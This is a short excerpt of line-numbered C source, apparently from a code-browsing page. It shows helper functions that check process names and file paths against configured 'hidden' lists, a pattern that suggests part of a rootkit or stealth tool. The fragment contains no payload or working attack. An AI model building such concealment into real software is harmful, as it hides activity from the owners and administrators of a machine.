| 50 | return Configuration && StringListContains(Configuration->HiddenProcessNames, name); |
| 51 | } |
| 52 | BOOL IsProcessNameHiddenU(UNICODE_STRING name) |
| 53 | { |
| 54 | PWCHAR chars = ConvertUnicodeStringToString(name); |
| 55 | if (chars) |
| 56 | { |
| 57 | BOOL result = IsProcessNameHidden(chars); |
| 58 | FREE(chars); |
| 59 | return result; |
| 60 | } |
| 61 | else |
| 62 | { |
| 63 | return FALSE; |
| 64 | } |
| 65 | } |
| 66 | BOOL IsPathHidden(LPCWSTR path) |
| 67 | { |
| 68 | return Configuration && StringListContains(Configuration->HiddenPaths, path); |
no test coverage detected